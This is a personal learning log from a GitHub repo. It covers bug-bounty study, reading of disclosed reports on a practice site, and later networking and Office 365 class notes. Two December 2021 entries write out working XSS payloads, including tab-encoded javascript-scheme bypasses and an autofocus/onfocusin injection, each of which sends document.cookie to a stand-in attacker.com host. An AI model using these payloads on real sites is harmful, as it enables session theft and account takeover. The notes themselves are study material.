100DaysofLearning Daily Checklist - ✅

i create this repo inspired by @AnubhavSingh_(https://github.com/anubhavsinghhacker) and @vish_hal(https://github.com/vish-hal/) bhai, what i do everyday i will update daily on my github repo.

Date - 28/11/2021

Date - 29/11/2021

Date - 30/11/2021

Date - 1/12/2021

Date - 2/11/2021

Date - 3/11/2021

Date - 4/11/2021

Date - 5/11/2021

Date - 6/11/2021

Date - 7/11/2021

Date - 8/11/2021

#solve tryhackme room
#read zseano print book
#read firstblood1/2 Disclosed report ✅
- https://www.bugbountyhunter.com/hackevents/report?id=692 (Becoming a root on the server)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=418 (Email of an appointment could be modified if cookie doctorAuthed is)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=893 (Information about used dependencies is leaked via /vendor/composer/installed.json)-(panya report)
- https://www.bugbountyhunter.com/hackevents/report?id=357 (Open redirect via ref parameter on /drpanel/logout.php endpoint)-(panya | same as holybugx)
- https://www.bugbountyhunter.com/hackevents/report?id=308 (Reflective XSS on login.php via goto parameter)-(panya)
- https://www.bugbountyhunter.com/hackevents/report?id=343 ( Reflective XSS on login.php via goto parameter after successful login)-(panya) (report not so good)
- https://www.bugbountyhunter.com/hackevents/report?id=154 (Reflective XSS on /login.php endpoint through the vulnerable ref parameter)-(holybugx) (quality report) 👌🏻 (bypass for xss are awesome)

Bypasses

				- ja%09vascript
				- ja%0avascript
				- ja%0dvascript
				- http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
				- http://firstbloodhackers.com/login.php?ref=ja	vascript:window.location.href=`http://attacker.com/${document.cookie}`
				- %09 -> Tab
				- %60 -> `
				- %7B - > {
				- %7D - }
				- %60 -> `

#want to create some usefull tool (if possible) ✅
#try to do some manual recon on BugBounty program / JS recon ✅
- www.bugbountytranning.com (recon challenge)
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
#try to read 1 intrigity-blog Bug-Bytes per day
#try to read payload artirst weekly blog
#try to read anurag sr news latter
#try to daily hunt on "fastfoodhacking"
#read disclosed report

Date - 9/11/2021

Date - 10/11/2021

Date - 11/12/2021

Date - 12/12/2021

Date - 13/12/2021

#solve tryhackme room ✅
- - answer 1 question. 😒
#read zseano print book

#read firstblood1/2 Disclosed report ✅

https://www.bugbountyhunter.com/hackevents/report?id=465 | 9:00AM - 10:35AM | (Reflected XSS on /login.php through the "goto" parameter leading to ATO)-(holybugx)-(quality report) 👌🏻

  GET /login.php?goto=holy
  	\_reflected-value on source code
  		\_<input name="goto" value="holy" type="hidden">


  GET /login.php?goto=holy<"'>
  	\_reflected-value on source code
  		\_<input name="goto" value="holy<"'>  --> input tag is closed
  			" type="hidden">


  My thought we can also do like this:
  ------------------------------------
  holy<"'>  -> holy"<' > (i dont know it can't be)


  autofocus meanings:
  -------------------
  The autofocus attribute is a boolean attribute.
  When present, it specifies that the element should automatically get focus when the page loads.


  onfocusin:
  ----------
  Execute a JavaScript when an input field is about to get focus.


  Payload:
  -------
  https://firstbloodhackers.com/login.php?goto=xyz%22%20autofocus%20onfocusin=%22window.location.href=`http://Attacker.com/?${document.cookie}`%22%3E


  Ultimate Payload:
  -----------------
  XSS payload are awesome.

  when the value is reflected in source-code and using "autofocus" the input field automatically get in focus 
  and "onfocusin" listening for any upcoming focus then he execute the JavaScript and BOOM.  


  <input name="goto" value="xyz" autofocus onfocusin="window.location.href=`http://Attacker.com/?${document.cookie}`">

https://www.bugbountyhunter.com/hackevents/report?id=479 ( Reflected XSS on /login.php using "goto" parameter and javascript scheme)-(sceniro changed exploit "goto" parameter using "javascript Schema")-(holybugx)-(quality report) 👌🏻

#want to create some usefull tool (if possible)
#try to do some manual recon on BugBounty program / JS recon
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc.. ✅
- learned something abount jquary
#try to read 1 intrigity-blog Bug-Bytes per day
#try to read payload artirst weekly blog
#try to read anurag sr news latter
#try to daily hunt on "fastfoodhacking" ✅
- Found something intersting .
#read disclosed report ✅

Date - 14/12/2021

Date - 15/12/2021

Noting doing today.

Date - 16/12/2021

Date - 17/12/2021

Date - 18/12/2021

Date - 19/12/2021

Date - 20/12/2021

Date - 21/12/2021

Date - 22/12/2021

Date - 23/12/2021

Date - 24/12/2021

Date - 25/12/2021

(Today i am doing nothing beacuse tommorrow my second vacine was completed and i am feeling pain in my brain today.)

Date - 26/12/2021

Date - 27/12/2021

Date - 28/12/2021

Date - 29/12/2021

Date - 30/12/2021

Date - 31/12/2021

Date - 1/1/2022

Date - 2/1/2022

Date - 3/1/2022

Date - 4/1/2022

Date - 5/1/2022

Date - 6/1/2022

Date - 7/1/2022

Date - 8/1/2022

Date - 9/1/2022

Date - 10/1/2022

Date - 11/1/2022

Date = 12/1/2022

Date - 13/1/2022

Date -14/1/2022

Date - 15/1/2022

Date - 16/1/2022

Date - 17/1/2022

Date - 18/1/2022

Date - 22/1/2022

Date - 24/1/2022

Date - 26/1/2022

Date - 27/1/2022

Date - 1/2/2022

Date - 5/2/2022

Date - 26/4/2022

#solving python problem ✅
- Print without b' prefix for bytes in Python 3 [https://stackoverflow.com/questions/16748083/print-without-b-prefix-for-bytes-in-python-3]

Date - 30/4/2022

#read disclosed report ✅
- https://infosecwriteups.com/how-hackers-are-changing-lives-4659a834cb8b [how you can missing people]
- https://ashkan-ebtekari.medium.com/by-pass-two-factor-authentication-7c9ba9c27797

Date - 1/5/2022

#read disclosed report ✅
- https://shreyaskoli.medium.com/ato-without-any-interaction-aws-cognito-misconfiguration-d690f4b3da11 [aws-cognito-misconfiguration or client side bypass]

Date - 3/5/2022

#read disclosed report ✅
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-78-1044058?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
  - Awesome year-wise collection of CVE PoCs [https://github.com/trickest/cve]

Date - 4/5/2022

#read disclosed report ✅
- Learn with @j3ssiejjj - Automating Recon at scale using Osmedeus!! {https://youtu.be/ohi0fsLTesw}

Date - 7/5/2022

#read disclosed report ✅
- working on python project

Date - 10/5/2022

#read disclosed report ✅
- revise old linux topic.
- Python Web Penetration Testing Cookbook [Page : 1-25]

Date - 23/5/2022

#read disclosed report ✅
- https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc
- solving basic linux questions

Date - 27/5/2022

#read disclosed report ✅
- revisting python old topic (Ex- Data types, funcation, Dict, Tuples etc... )

Date - 30/5/2022

#Today learn from jetking classes ✅
- Learing about shared mail box in office 365

Date - 31/5/2022

#read disclosed report ✅
- Learning Security Concept & Management. {https://docs.google.com/presentation/d/1ASBtHhkq9zLv4G0tCZLDhbUhbYX6vXa1/edit?usp=sharing&ouid=108625976354777920719&rtpof=true&sd=true}

Date - 1/6/2022

#read disclosed report ✅
- Learing Bankend Technology About (Ex- Virtualization,Hypervisor,DC,Dcoker)

Date - 2/6/2022

#Today learn from jetking classes ✅
- Learning Office 365 {Teams application uses}
  - how to schedule metting

Date - 6/6/2022

#Today learn from jetking classes ✅
- Learning About Onedrive.
  - How to share any document from onedrive ?
  - How to share document to a specific person ?
  - How to share document to a specific Group ?

Date - 7/6/2022

#Today learn from jetking classes ✅
- Attend PD Class mock
- watching old classes video

Date - 14/6/2022

#Today learn from jetking classes ✅
- Configuring rip
- Learing About basic REQ,RES Header and etc.

Date - 15/6/2022

#Today learn from jetking classes ✅
- how to configure DHCP in router.
- How to configure FTP in windows system.

Date - 16/6/2022

#Today learn from jetking classes ✅
- RAID-0 & RAID-1 configuration
- How to create simple volume ?
- How to create spanned volume ?[Dynamic disk ea ai gulo create korte hoba]
- How to configure Raid-0 ?{dynamic volume}
- How to create RAID1 or Mirrored Volume ?
#Pratical Done ✅
- Configuring DHCP & RIP v1 in cisco packet tracer.
- rip akta question jigasa korte hoba. ✅
- how to configure DHCP in router ✅
#Dheeraj sir class
- AWS Class Recording ✅ - Date [16/6/2022] - Time [7:59]

Date - 17/6/2022

#Today learn from jetking classes ✅
- Create outlook & configured outlook account.
- Configured Telnet in router [Cisco Packet Tracer]
- Offline file sharing

Date - 18/6/2022

#Today learn from jetking classes ✅
- Create outlook & configured outlook account.
- Configured Telnet in router [Cisco Packet Tracer]
- Offline file sharing
#Pratical Done ✅
- Map network drive.
#Pending Task
- ajke [telnet] er command gulo lekha hoy ni video ta dekhe likte hoba.✅ - Date [18/6/2022] - Time [9:02]
- offline bapare sir ejta bolo sai video tau akbar dakte hoba. ✅ - Date [18/6/2022] - Time [9:30]
#Dheeraj sir class
- How to Monitor Server,Serices,Docker Container Using Nagios. ✅

arijitdirghangi/100DaysofLearning

100DaysofLearning Daily Checklist - ✅